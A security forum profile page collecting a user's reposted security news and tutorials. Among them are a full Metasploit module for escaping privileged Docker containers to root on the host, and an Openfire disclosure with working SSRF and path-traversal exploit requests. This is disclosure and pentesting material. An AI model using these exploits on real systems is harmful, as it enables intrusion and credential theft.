Jump to content

Kev

Active Members
  • Content Count

    200
  • Joined

  • Days Won

    11

Kev last won the day on August 12

Kev had the most liked content!

Community Reputation

109 Excellent

About Kev

  • Rank
    Active Member

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Industry binning old aircraft is an opportunity for aviation infosec DEF CON Boeing 747-400s still use floppy disks for loading critical navigation databases, Pen Test Partners has revealed to the infosec community after poking about one of the recently abandoned aircraft. The eye-catching factoid emerged during a DEF CON video interview of PTP's Alex Lomas, where the man himself gave a walkthrough of a 747-400, its avionics bay and the flight deck. Although airliners are not normally available to curious infosec researchers, a certain UK-based Big Airline's decision to scrap its B747 fleet gave Pen Test Partners a unique opportunity to get aboard one and have a poke about before the scrap merchants set about their grim task. While giving a tour of the aircraft on video (full embed below), Lomas pointed out the navigation database loader. To readers of a certain vintage it'll look very familiar indeed. Navigation data aboard Boeing 747-436 airliners is updated via a 3.5" floppy drive. The aircraft were built in the late 1990s A quick tour of the avionics bay, buried beneath the floor of the lower passenger deck, revealed a server-room-esque array of line replaceable units and cabling, prompting Lomas to bust lots of Hollywood-grade dreams by saying: "You can't just clip into a pair of wires into the back of the aircraft and gain access to all of these." In a subsequent Q&A for DEF CON's virtual attendees (this year's hacking conference was done remotely thanks to COVID-19), Pen Test Partners chief Ken Munro asked Lomas about points of interest to aviation infosec researchers. The latter then described various aviation-specific ARINC equipment and connectivity standards, including ARINC 664 ("...Ethernet with some extra quality-of-service layers on top to make sure flight-critical things can talk to each other") as used in the Boeing 787 and the latest generation of airliners, ARINC 629 ("really only used in the [Boeing] 777"), and other potential areas of research interest including VxWorks' real-time OS, which is used in a number of airliners' internal networks. The key question everyone wants to know the answer to, though, is whether you can hack an airliner from the cheap seats, using the in-flight entertainment (IFE) as an attack vector. Lomas observed: That hasn't stopped some people from trying, most notably an infosec researcher from a Scottish university who deployed a well-known pentesting technique against IFE equipment at the start of a nine-hour transatlantic flight. Mercifully he only managed to KO his own screen. There is a long and storied history of otherwise obsolete technologies being retained in use because they're built into something bigger and yet work well, not least aboard Royal Navy survey ship HMS Enterprise. Last seen in these hallowed pages a couple of years ago when the Navy invited your correspondent aboard the warship during a NATO exercise in Norway, Enterprise's hotchpotch of Windows ME-based survey software is now helping port authorities in Beirut assess the damage caused by the disastrous ammonium nitrate explosion earlier this month. ® Bootnote Of potential interest to researchers who don't have access to a spare 747 for a spot of pentesting is the new Microsoft Flight Simulator. Due for release in just over a week, the latest version of the classic sim franchise will include and support the use of ARINC 429-compatible navigation datasets, of the exact same type loaded into the 747 on a 3.5" floppy. While the fidelity of the simulator software reading and executing that data may not be comparable with the real thing, inexpensive access to a real dataset can offer insights into further research areas – though the tale of the Boeing 787 and Warsaw's BIMPA 4U arrival is unlikely to be repeatable. Via theregister.com
  2. Domain fronting, the technique of circumventing internet censorship and monitoring by obfuscating the domain of an HTTPS connection was killed by major cloud providers in April of 2018. However, with the arrival of TLS 1.3, new technologies enable a new kind of domain fronting. This time, network monitoring and internet censorship tools are able to be fooled on multiple levels. This talk will give an overview of what domain fronting is, how it used to work, how TLS 1.3 enables a new form of domain fronting, and what it looks like to network monitoring. You can circumvent censorship and monitoring today without modifying your tools using an open source TCP and UDP pluggable transport tool that will be released alongside this talk. Source
  3. Facebook has announced the availability of Pysa (Python Static Analyzer), an open-source tool designed for the static analysis of Python code. The security-focused tool relies on Pyre, Facebook’s type checker for Python, and allows for the analysis of how data flows through code. It can be used to identify issues related to the protection of user data, as well as flaws such as XSS and SQL injection. In addition to making Pysa available in open source, Facebook released many of the definitions that it leverages when looking for security bugs, making it readily available for others to start analyzing their own Python code. The tool also leverages open source Python server frameworks, including Django and Tornado, and this makes it usable for code analysis right from the start. Furthermore, only few lines of code are needed to use Pysa for additional frameworks, Facebook says. Pysa allows users to define sources of origin for important data and places where that data should not reach, which are called sinks. The tool then identifies functions that return data from a source and those that reach a sink and, if it discovers a connection between a source and a sink, it reports the issue. The tool was designed in such a manner that it avoids false negatives, thus supposedly identifying as many security issues as possible. This, however, results in more false positives, and, to remove these as well, Facebook’s engineers added sanitizers and features into the tool. The social media platform admits that Pysa has its limitations “based on its choice to address security issues related to data flow, together with design decisions that trade off performance for precision and accuracy.” Furthermore, Pysa was designed only for the discovery of data flow–related security issues, meaning that it won’t identify security or privacy issues that cannot be modeled as flows of data. Although nearly half of the results returned in the timeframe were false positives, Facebook was able to tune Pysa up, and says that it eventually returned “100 percent valid issues.” Via securityweek.com
  4. Here's another iteration on the Zero Terminal projects I've been working on for a few years. For those of you who haven't seen them, I've been trying to design the most usable all in one Pi Zero computer out there. This version departs a little from the previous ones, as it is more focused on modularity, and forgoes a keyboard as standard, though it is possible to add one, as I'll show you in a bit. The goal here was to create something very versatile, allowing for all sorts of use cases to unlock the Zero's potential. Anyways, let's take a look at it. DESIGN The first thing you'll notice is that the device looks a little like a fat smartphone. That's because the entire thing is basically designed around the Waveshare AMOLED 5.5" 1080p touchscreen (https://www.waveshare.com/5.5inch-HDMI-AMOLED.htm). This thing was originally designed for the Raspberry Pi's 3 and 4, but I created a bunch of custom adaptors that let you hook up a Pi Zero instead. More on that in a minute. Around the outside, you'll see various ports and buttons, including a full size USB 2.0 port, micro SD socket for the operating system, micro USB for charging and a power switch. On the side there is a headphone jack, and 3 programmable buttons hooked up to the Zeros GPIO pins. You could set up all sorts of functions for these, like rotating the screen, volume up and down, or launching other custom scripts and applications with a single press. On the top end is another button which turns the display off and on, helping stretch out the 1200mAh lipo battery life, and also a grill hiding a little speaker behind it. The back of the device is where all the potential lies. This includes 2 40pin sockets which connect to both the GPIO pins, video out, camera connector, 2x USB ports, power indicators and more. The idea is to allow people to create and add custom backpacks to change the functionality, depending on their needs. INTERNALS In order to connect the Zero to the display in the smallest possible space, I created a main PCB, and a few smaller adaptor PCBs. The Zero itself is screwed onto the board and soldered directly to it via the GPIO pins. This main board contains a USB hub, power circuit, audio amp, speaker, buttons, headphone jack, and even a vibration motor for custom notifications. There's a micro SD card board plugged into the Zero which extends the card socket, and also doubles as a frame for the other ports at the bottom of the device. The Waveshare display already has some mounting screws, so securing the main board is easy. There's a little header section to connect the display to the main board, and you simply screw everything together. I included 6 threaded inserts onto this board to make attaching different cases simple too. The Zero only has 1 USB port as standard, so I designed a little USB hub circuit on the main board, using the simple FE1.1S chip. This splits the USB port into 4 separate streams, and is good enough for lower consumption stuff like mice and keyboards, as well as the displays touchscreen capability. You'd probably need to hook up external 5v lines for more power hungry peripherals. I'm particularly pleased with the HDMI adaptor, which connects the full size HDMI port on the display to the mini HDMI port of the Zero. I was wracking my brains for a long time on how to connect these in the smallest possible way, and it turns out using two thin PCBs sandwiched together allows this, since you can solder to both the HDMI-A plug component which takes a 1.6mm PCB, and the smaller Mini HDMI plug, which only takes up to 1mm boards. The power section is something I had trouble with. It's based on the Powerboost 1000c design, and was supposed to fit directly onto the main board, but a couple of the small ICs where too fiddly for me to hand solder and I damaged them before making this video. I would have just included the Powerboost board itself, but unfortunately there's not enough room. Instead I used a cheap generic charge boost board, which is fine for this prototype, but doesn't have all the extra features such as low battery indicators, and a better power switch circuit. That'll be for the next iteration. The Zero doesn't come with audio as standard, but thankfully the Waveshare display does have a built in headphone jack for audio through HDMI. So I wondered if I added an audio amp circuit to the pins on the headphone jack, whether I could power a small speaker, and yes it works. Unfortunately, not very well though, but it's good enough for stuff like bleeps and bloops for notification sounds. Audio through the headphones sounds great though, and I added my own jack in there so it's accessible from the outside of the case. This particular jack has a mechanical switch which defaults to the speakers, and automatically switches to headphones whenever the 3.5mm plug is inserted. ADD-ONS As I previously mentioned, I think the backpack feature of this is where you really see the potential of the device. I can imagine all sorts of different backpacks that could transform the functionality of this. Things like radio transceivers, extra network interfaces, games controllers, TV tuners, solar panels, and simple stands are all easily doable. The cool thing is that since it's modular you can swap these on the fly to change the functionality, so say you could change between a keyboard & radio transceiver combo for a packet radio messenger, then replace that with a different operating system on the micro SD card, and add a game controller to turn it into a portable emulator. The first prototype backpack I have created is a slide-out keyboard. When you combine that with i3 window manager, you have quite the productive handheld Linux machine. Even though the Zero isn't the most powerful computer, you can still get a lot done through the terminal since it uses up a fraction of the resources that a GUI does. The design is based on the great mini (Pi)QWERTY keyboard by Bobricius on Hackaday (hackaday.io/project/158454), and uses a SAMD21 chip to turn it into a USB input device. It's made using 3 PCB layers. Firstly, the bottom, which contains the electronic components and keys, then a cover PCB which displays the key labels, then another board that connects all that to the terminal. The slide mechanism is made up of 3D printed supports and tiny screws, and while it does slide, it needs extra work to make it more robust. The bottom layer connects to the top using little spring loaded pins. I've also added a couple of LEDs you can toggle on and off when you're in low light. The final thing is surprisingly thin, at only a few millimetres deep. Although I think it looks good, I haven't gotten it working properly yet. I've talked to Bob about the design, and I think it's solid. The problem appears to be with the chip programmer I'm using to get the firmware onto it. It's one of the cheap ones, and seems to be giving me false verification messages. Anyways, you get the idea of how it could make the Zero Terminal a pretty handy little device. I also created another custom mini keyboard stand, this time using a salvaged Psion 5MX keyboard, which is still probably one of the best small keyboards ever designed. I used a premade PSION keyboard to USB adaptor that you can find on Tindie, and the thing is open source so you can make you're own too. It wouldn't be much of a stretch to go even further to develop a full adaptor case which would turn it into a Palmtop computer, with working hinge, and maybe a bigger secondary battery and USB hub. NEXT STEPS I have registered ZeroTerminal.org, which is currently redirecting to this page. Over the next year, as I update the design, I want to make a website to help build up the platform, showing people exactly how to make these, and showcasing all the backpacks and custom apps other users create. In the meantime I want to redo the main PCB, change up some components like the rubbish speaker, redesign the power circuit etc, maybe even experiment with using the Raspberry Pi Compute Module instead. Long term it'd be amazing to design a custom display board, then the entire device could be shrunken further, closer to smartphone size. Anyways, I hope you found this interesting. I know I have a lot to learn about all this kind of stuff, so any advice from experts is welcome. Please share this video around if you think others will like it. Thanks and I'll see you in the next video. -- This project first appeared in NODE Vol 02, our new indepedent 180 page zine, packed with all sorts of open hardware and decentralized software projects. Pick up a hard copy, or download for free from the zine page. https://N-O-D-E.net/zine/ Source
  5. Wherever you changed or updated the Squid proxy server, you should verify that your squid.conf file is error-free. It is an easy task. To check the squid.conf file for any syntax errors and warnings type the following commands. Test or check your Squid proxy server configuration file for Errors Open the Terminal Window and then type the following command. For remote Linux and Unix server login using the ssh command: $ ssh vivek@server1.cyberciti.biz Now run the following command as root user: Sample session: 2020/08/08 08:16:42| Startup: Initializing Authentication Schemes ... 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'basic' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'digest' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'negotiate' 2020/08/08 08:16:42| Startup: Initialized Authentication Scheme 'ntlm' 2020/08/08 08:16:42| Startup: Initialized Authentication. 2020/08/08 08:16:42| Processing Configuration File: /etc/squid/squid.conf (depth 0) 2020/08/08 08:16:42| Processing: acl mylan src 10.8.0.0/24 2020/08/08 08:16:42| Processing: acl mylan src 172.16.0.0/24 2020/08/08 08:16:42| Processing: acl SSL_ports port 443 2020/08/08 08:16:42| Processing: acl Safe_ports port 80 # http 2020/08/08 08:16:42| Processing: acl Safe_ports port 21 # ftp 2020/08/08 08:16:42| Processing: acl Safe_ports port 443 # https 2020/08/08 08:16:42| Processing: acl Safe_ports port 70 # gopher 2020/08/08 08:16:42| Processing: acl Safe_ports port 210 # wais 2020/08/08 08:16:42| Processing: acl Safe_ports port 1025-65535 # unregistered ports 2020/08/08 08:16:42| Processing: acl Safe_ports port 280 # http-mgmt 2020/08/08 08:16:42| Processing: acl Safe_ports port 488 # gss-http 2020/08/08 08:16:42| Processing: acl Safe_ports port 591 # filemaker 2020/08/08 08:16:42| Processing: acl Safe_ports port 777 # multiling http 2020/08/08 08:16:42| Processing: acl CONNECT method CONNECT 2020/08/08 08:16:42| Processing: http_access deny !Safe_ports 2020/08/08 08:16:42| Processing: http_access deny CONNECT !SSL_ports 2020/08/08 08:16:42| Processing: http_access allow localhost manager 2020/08/08 08:16:42| Processing: http_access deny manager 2020/08/08 08:16:42| Processing: http_access allow localhost 2020/08/08 08:16:42| Processing: http_access allow mylan 2020/08/08 08:16:42| Processing: http_access deny all 2020/08/08 08:16:42| Processing: http_port 10.8.0.1:3128 2020/08/08 08:16:42| Processing: dns_v4_first on 2020/08/08 08:16:42| Processing: tcp_outgoing_address 13.xxx.yyy.zzz 2020/08/08 08:16:42| Processing: cache_mem 256 MB 2020/08/08 08:16:42| Processing: cache_dir diskd /var/spool/squid 1024 16 256 Q1=72 Q2=64 2020/08/08 08:16:42| Processing: access_log daemon:/var/log/squid/access.log squid 2020/08/08 08:16:42| Processing: coredump_dir /var/spool/squid 2020/08/08 08:16:42| Processing: refresh_pattern ^ftp: 1440 20% 10080 2020/08/08 08:16:42| Processing: refresh_pattern ^gopher: 1440 0% 1440 2020/08/08 08:16:42| Processing: refresh_pattern -i (/cgi-bin/|\?) 0 0% 0 2020/08/08 08:16:42| Processing: refresh_pattern (Release|Packages(.gz)*)$ 0 20% 2880 2020/08/08 08:16:42| Processing: refresh_pattern . 0 20% 4320 2020/08/08 08:16:42| Processing: forwarded_for delete 2020/08/08 08:16:42| Processing: via off 2020/08/08 08:16:42| Processing: forwarded_for off 2020/08/08 08:16:42| Processing: follow_x_forwarded_for deny all 2020/08/08 08:16:42| Processing: request_header_access X-Forwarded-For deny all 2020/08/08 08:16:42| Processing: forwarded_for delete 2020/08/08 08:16:42| Processing: dns_nameservers 10.8.0.1 2020/08/08 08:16:42| WARNING: HTTP requires the use of Via 2020/08/08 08:16:42| Initializing https:// proxy context Example of error reported when we do Squid check config file for syntax errors # squid -k parse 2020/08/08 08:21:07| Processing: viaproxy off 2020/08/08 08:21:07| /etc/squid/squid.conf:40 unrecognized: 'viaproxy' Edit the config file and fix that error: # vim +40 /etc/squid/squid.conf Find: viaproxy off Replace with: via off Save and close the file. Now test it again: # squid -k parse Now we can reload our squid proxy server without restarting squid daemon as follows: # squid -k reconfigure How to syntax check the squid configuration file It is always good to run a ‘squid -k parse‘ and ‘squid -k debug‘ commands to check config syntax error whenever you change your configuration for the proxy server. Please note that Squid refused to start if it detects an error. Hence, we need to make sure there are no errors when the server reboots for kernel updates. If an error exists, Squid will remain down till sysadmin fix syntax errors. Other useful Squid proxy options The syntax is: # squid -k command OR $ sudo squid -k command Where command can be any one of the following: reconfigure : Sends a HUP signal to Squid to re-read its configuration files. rotate : Rotate log files. shutdown : Sends a TERM signal to Squid to wait briefly for current connections to finish and then shutdown server. The amount of time to wait is specified with shutdown_lifetime options in squid.conf file. restart : Restart the server interrupt : Sends an INT signal to Squid server. It shutdown immediately, without waiting for current connections. kill : Kill proxy server by sending a KILL signal. debug : Run squid in full debugging mode. check : Sends a “ZERO” signal to the Squid server. This simply checks whether or not the server/process is actually running on your Linux/Unix/BSD box. parse : Parses the squid.conf file for syntax errors. Conclusion You learned how to parse Squid proxy server configuration file, then send signal to running copy and exit to the CLI. This is useful to test or check for syntax errors in squid.conf and other files. See Squid Proxy server documents for more information. Source
  6. The block was put in place at the end of July and is enforced via China's Great Firewall. The Chinese government has deployed an update to its national censorship tool, known as the Great Firewall (GFW), to block encrypted HTTPS connections that are being set up using modern, interception-proof protocols and technologies. The ban has been in place for at least a week, since the end of July, according to a joint report published this week by three organizations tracking Chinese censorship -- iYouPort, the University of Maryland, and the Great Firewall Report. CHINA NOW BLOCKING HTTPS+TLS1.3+ESNI Through the new GFW update, Chinese officials are only targeting HTTPS traffic that is being set up with new technologies like TLS 1.3 and ESNI (Encrypted Server Name Indication). Other HTTPS traffic is still allowed through the Great Firewall, if it uses older versions of the same protocols -- such as TLS 1.1 or 1.2, or SNI (Server Name Indication). For HTTPS connections set up via these older protocols, Chinese censors can infer to what domain a user is trying to connect. This is done by looking at the (plaintext) SNI field in the early stages of an HTTPS connections. In HTTPS connections set up via the newer TLS 1.3, the SNI field can be hidden via ESNI, the encrypted version of the old SNI. As TLS 1.3 usage continues to grow around the web, HTTPS traffic where TLS 1.3 and ESNI is used is now giving Chinese sensors headaches, as they're now finding it harder to filter HTTPS traffic and control what content the Chinese population can access. Image: Qualys SSL Labs (via SixGen) Per the findings of the joint report, the Chinese government is currently dropping all HTTPS traffic where TLS 1.3 and ESNI are used, and temporarily banning the IP addresses involved in the connection, for small intervals of time that can vary between two and three minutes. SOME CIRCUMVENTION METHODS EXIST... FOR NOW For now, iYouPort, the University of Maryland, and the Great Firewall Report said they were able to find six circumvention techniques that can be applied client-side (inside apps and software) and four that can be applied server-side (on servers and app backends) to bypass the GFW's current block. ZDNet also confirmed the report's findings with two additional sources -- namely members of a US telecommunications provider and an internet exchange point (IXP) -- using instructions provided in this mailing list Via zdnet.com.
  7. This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, { 'Name' => 'Docker Privileged Container Escape', 'Description' => %q{ This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`. }, 'License' => MSF_LICENSE, 'Author' => ['stealthcopter'], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 }, 'SessionTypes' => ['shell', 'meterpreter'], 'DefaultTarget' => 0, 'References' => [ ['EDB', '47147'], ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'], ['URL', 'https://github.com/stealthcopter/deepce'] ], 'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm } ) ) register_advanced_options( [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]), OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']), OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']), ] ) end def base_dir_container datastore['WritableContainerDir'].to_s end def base_dir_host datastore['WritableHostDir'].to_s end # Get the container id and check it's the expected 64 char hex string, otherwise return nil def container_id id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp unless id.match(/\A[\h]{64}\z/).nil? id end end # Check we have all the prerequisites to perform the escape def check # are in a docker container unless file?('/.dockerenv') return CheckCode::Safe('Not inside a Docker container') end # is root user unless is_root? return Exploit::CheckCode::Safe('Exploit requires root inside container') end # are rdma files present in /sys/ path = cmd_exec('ls -x /s*/fs/c*/*/r* | head -n1') unless path.start_with? '/' return Exploit::CheckCode::Safe('Required /sys/ files for exploitation not found, possibly old version of docker or not a privileged container.') end CheckCode::Appears('Inside Docker container and target appears vulnerable') end def exploit unless writable? base_dir_container fail_with Failure::BadConfig, "#{base_dir_container} is not writable" end pl = generate_payload_exe exe_path = "#{base_dir_container}/#{rand_text_alpha(6..11)}" print_status("Writing payload executable to '#{exe_path}'") upload_and_chmodx(exe_path, pl) register_file_for_cleanup(exe_path) print_status('Executing script to exploit privileged container') script = shell_script(exe_path) vprint_status("Script: #{script}") print_status(cmd_exec(script)) print_status "Waiting #{datastore['WfsDelay']}s for payload" end def shell_script(payload_path) # The tricky bit is finding the payload on the host machine in order to execute it. The options here are # 1. Find the file on the host operating system `find /var/lib/docker/overlay2/ -name 'JGsgvlU' -exec {} \;` # 2. Copy the payload out of the container and execute it `docker cp containerid:/tmp/JGsgvlU /tmp/JGsgvlU && /tmp/JGsgvlU` id = container_id filename = File.basename(payload_path) vprint_status("container id #{id}") # If we cant find the id, or user requested it, search for the payload on the filesystem rather than copying it out of container if id.nil? || datastore['ForcePayloadSearch'] # We couldn't find a container name, lets try and find the payload on the filesystem and then execute it print_status('Searching for payload on host') command = "find /var/lib/docker/overlay2/ -name '#{filename}' -exec {} \\;" else # We found a container id, copy the payload to host, then execute it payload_path_host = "#{base_dir_host}/#{filename}" print_status("Found container id #{container_id}, copying payload to host") command = "docker cp #{id}:#{payload_path} #{payload_path_host}; #{payload_path_host}" end vprint_status(command) # the cow variables are random filenames to use for the exploit c = rand_text_alpha(6..8) o = rand_text_alpha(6..8) w = rand_text_alpha(6..8) %{ d=$(dirname "$(ls -x /s*/fs/c*/*/r* | head -n1)") mkdir -p "$d/#{w}" echo 1 >"$d/#{w}/notify_on_release" t="$(sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab)" touch /#{o} echo "$t/#{c}" >"$d/release_agent" printf "#!/bin/sh\\n%s > %s/#{o}" "#{command}" "$t">/#{c} chmod +x /#{c} sh -c "echo 0 >$d/#{w}/cgroup.procs" sleep 1 cat /#{o} rm /#{c} /#{o} }.strip.split("\n").map(&:strip).join(';') end end Source
  8. Kev

    LeakIX

    About LeakIX This project goes around the internet and finds services to index them. 3 scopes Services In this scope we grab the banners from open services and make them available for search in the service scope. Webapp Coming soon. Leaks In this scope we inspect found services for weak credentials, meaning : No credentials Weak credentials, widely used by botnets ( eg: root:root, admin:admin, 123456 ) No databases/service data are actually stored, we do keep table names + time the leak happened. URL: https://leakix.net Via OSINT
  9. Kev

    COVID-19

    De acord, nu ramaneau telefoanele/clipurile dacã era sa fie prãpãd Totuși refrenul din 2004 spune multe: YT: Profethu - Protest ( 2004 )
  10. Written by Alexandr Shvetsov on August 4, 2020 Openfire is a Jabber server supported by Ignite Realtime. It’s a cross-platform Java application, which positions itself as a platform for medium-sized enterprises to control internal communications and make instant messaging easier. I regularly see Openfire on penetration testing engagements, and most of the time all interfaces of this system are exposed to an external attacker, including the administrative interface on 9090/http and 9091/https ports: Openfire Administration Console Since the Openfire system is available on GitHub, I decided to examine the code of this web interface. This is a short writeup about two vulnerabilities I was able to find. Full Read SSRF Vulnerability Assigned CVE: CVE-2019-18394 Vulnerable file: FaviconServlet.java (the fix commit) This vulnerability allows an unauthenticated attacker to send arbitrary HTTP GET requests to the internal network, and obtain full-sized outputs from the targeted web services. Let’s look at the vulnerable code contained in the FaviconServlet.java file: ... public void doGet(HttpServletRequest request, HttpServletResponse response) { String host = request.getParameter("host"); // Check special cases where we need to change host to get a favicon host = "gmail.com".equals(host) ? "google.com" : host; byte[] bytes = getImage(host, defaultBytes); if (bytes != null) { writeBytesToStream(bytes, response); } } private byte[] getImage(String host, byte[] defaultImage) { // If we've already attempted to get the favicon twice and failed, // return the default image. if (missesCache.get(host) != null && missesCache.get(host) > 1) { // Domain does not have a favicon so return default icon return defaultImage; } // See if we've cached the favicon. if (hitsCache.containsKey(host)) { return hitsCache.get(host); } byte[] bytes = getImage("http://" + host + "/favicon.ico"); .... } ... In the doGet and getImage methods the code gets the host variable from the get parameters, and constructs an URL from it without any constraints to the component parts. Thus, an attacker can place any sequence of characters inside of it, and make the server connect to any URL they want. An HTTP request to test the vulnerability: GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1 Host: assesmenthost.com:9090 An example of a vulnerable server’s behavior: An example of CVE-2019-18394 exploitation in Burp Suite Arbitrary File Read Vulnerability Assigned CVE: CVE-2019-18393 Vulnerable file: PluginServlet.java (the fix commit) This vulnerability affects only Windows installations of the OpenFire server, and an attacker has to have an administrative account on the server to exploit it. The vulnerable code is located in the PluginServlet.java file: ... @Override public void service(HttpServletRequest request, HttpServletResponse response) { String pathInfo = request.getPathInfo(); if (pathInfo == null) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); } else { try { // Handle JSP requests. if (pathInfo.endsWith(".jsp")) { ... } // Handle servlet requests. else if (getServlet(pathInfo) != null) { handleServlet(pathInfo, request, response); } // Handle image/other requests. else { handleOtherRequest(pathInfo, response); } } ... } private void handleOtherRequest(String pathInfo, HttpServletResponse response) throws IOException { String[] parts = pathInfo.split("/"); // Image request must be in correct format. if (parts.length < 3) { response.setStatus(HttpServletResponse.SC_NOT_FOUND); return; } String contextPath = ""; int index = pathInfo.indexOf(parts[1]); if (index != -1) { contextPath = pathInfo.substring(index + parts[1].length()); } File pluginDirectory = new File(JiveGlobals.getHomeDirectory(), "plugins"); File file = new File(pluginDirectory, parts[1] + File.separator + "web" + contextPath); // When using dev environment, the images dir may be under something other that web. Plugin plugin = pluginManager.getPlugin(parts[1]); ... } This vulnerability is interesting in that it exists in the URI itself, and the HTTP parameters are not involved. The handleOtherRequest method, which is responsible for handling the /plugin/search/ path, makes an assumption that if it splits the pathInfo variable by the “/” character, the obtained sequence will be safe to use. But since there is no allowlist of characters or any checking for the “\” character, we can perform a path-traversal attack for Windows systems. To test the vulnerability, log in to the server, and send the following request with the administrator’s JSESSIONID cookie: GET /plugins/search/..\..\..\conf\openfire.xml HTTP/1.1 Host: assesmenthost.com:9090 Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0; An example of a vulnerable server’s behavior: An example of CVE-2019-18393 exploitation in Burp Suite Conclusion Both discovered vulnerabilities were the result of unexisting user input data validation. So, my recommendation for the developers was to validate the parameters before performing sensitive operations with them, such as reading files and accessing URLs. It’s worth noting that system administrators should also protect all of the administrative interfaces against unauthorized access, and not make them available to external or internal attackers. The timeline: 2 October, 2019 – Reported to Ignite Realtime 3 October, 2019 – Issues have been addressed in main codeline 1 November, 2019 – Ignite Realtime released the 4.4.3 version 4 August, 2020 – Public disclosure Links: https://issues.igniterealtime.org/browse/OF-1885 https://issues.igniterealtime.org/browse/OF-1886 If you have an Openfire server, make sure you’ve updated it to version 4.4.3 or higher. Source
  11. CRITICAL Nessus Plugin ID 139244 Synopsis The remote Debian host is missing a security update. Description Several vulnerabilities were discovered in mercurial, an easy-to-use, scalable distributed version control system. CVE-2017-17458 In Mercurial before 4.4.1, it is possible that a specially malformed repository can cause Git subrepositories to run arbitrary code in the form of a .git/hooks/post-update script checked into the repository. Typical use of Mercurial prevents construction of such repositories, but they can be created programmatically. CVE-2018-13346 The mpatch_apply function in mpatch.c in Mercurial before 4.6.1 incorrectly proceeds in cases where the fragment start is past the end of the original data. CVE-2018-13347 mpatch.c in Mercurial before 4.6.1 mishandles integer addition and subtraction. CVE-2018-13348 The mpatch_decode function in mpatch.c in Mercurial before 4.6.1 mishandles certain situations where there should be at least 12 bytes remaining after the current position in the patch data, but actually are not. CVE-2018-1000132 Mercurial version 4.5 and earlier contains a Incorrect Access Control (CWE-285) vulnerability in Protocol server that can result in Unauthorized data access. This attack appear to be exploitable via network connectivity. This vulnerability appears to have been fixed in 4.5.1. CVE-2019-3902 Symbolic links and subrepositories could be used defeat Mercurial's path-checking logic and write files outside the repository root. For Debian 9 stretch, these problems have been fixed in version 4.0-1+deb9u2. We recommend that you upgrade your mercurial packages. For the detailed security status of mercurial please refer to its security tracker page at: https://security-tracker.debian.org/tracker/mercurial NOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. Solution Upgrade the affected mercurial, and mercurial-common packages. Source
  12. Mark Russinovich Chief Technology Officer, Microsoft Azure Microsoft has invested in the security of open-source software for many years and today I’m excited to share that Microsoft is joining industry partners to create the Open Source Security Foundation (OpenSSF), a new cross-industry collaboration hosted at the Linux Foundation. The OpenSSF brings together work from the Linux Foundation-initiated Core Infrastructure Initiative (CII), the GitHub-initiated Open Source Security Coalition (OSSC), and other open-source security efforts to improve the security of open-source software by building a broader community, targeted initiatives, and best practices. Microsoft is proud to be a founding member alongside GitHub, Google, IBM, JPMC, NCC Group, OWASP Foundation, and Red Hat. Open-source software is core to nearly every company’s technology strategy and securing it is an essential part of securing the supply chain for all, including our own. With the ubiquity of open source software, attackers are currently exploiting vulnerabilities across a wide range of critical services and infrastructure, including utilities, medical equipment, transportation, government systems, traditional software, cloud services, hardware, and IoT. Open-source software is inherently community-driven and as such, there is no central authority responsible for quality and maintenance. Because source code can be copied and cloned, versioning and dependencies are particularly complex. Open-source software is also vulnerable to attacks against the very nature of the community, such as attackers becoming maintainers of projects and introducing malware. Given the complexity and communal nature of open source software, building better security must also be a community-driven process. Microsoft has been involved in several open-source security initiatives over the years and we are looking forward to bringing these together under the umbrella of the OpenSSF. For example, we have been actively working with OSSC in four primary areas: Identifying Security Threats to Open Source Projects Helping developers to better understand the security threats that exist in the open-source software ecosystem and how those threats impact specific open source projects. Security Tooling Providing the best security tools for open source developers, making them universally accessible and creating a space where members can collaborate to improve upon existing security tooling and develop new ones to suit the needs of the broader open source community. Security Best Practices Providing open-source developers with best practice recommendations, and with an easy way to learn and apply them. Additionally, we have been focused on ensuring best practices to be widely distributed to open source developers and will leverage an effective learning platform to do so. Vulnerability Disclosure Creating an open-source software ecosystem where the time to fix a vulnerability and deploy that fix across the ecosystem is measured in minutes, not months. We are looking forward to participating in future OpenSSF efforts including securing critical open source projects (assurance, response), developer identity, and bounty programs for open-source security bugs. We are excited and honored to be advancing the work with the OSSC into the OpenSSF and we look forward to the many improvements that will be developed as a part of this foundation with the open-source community. To learn more and to participate, please join us at: https://openssf.org and on GitHub at https://github.com/ossf. To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity. Via microsoft.com
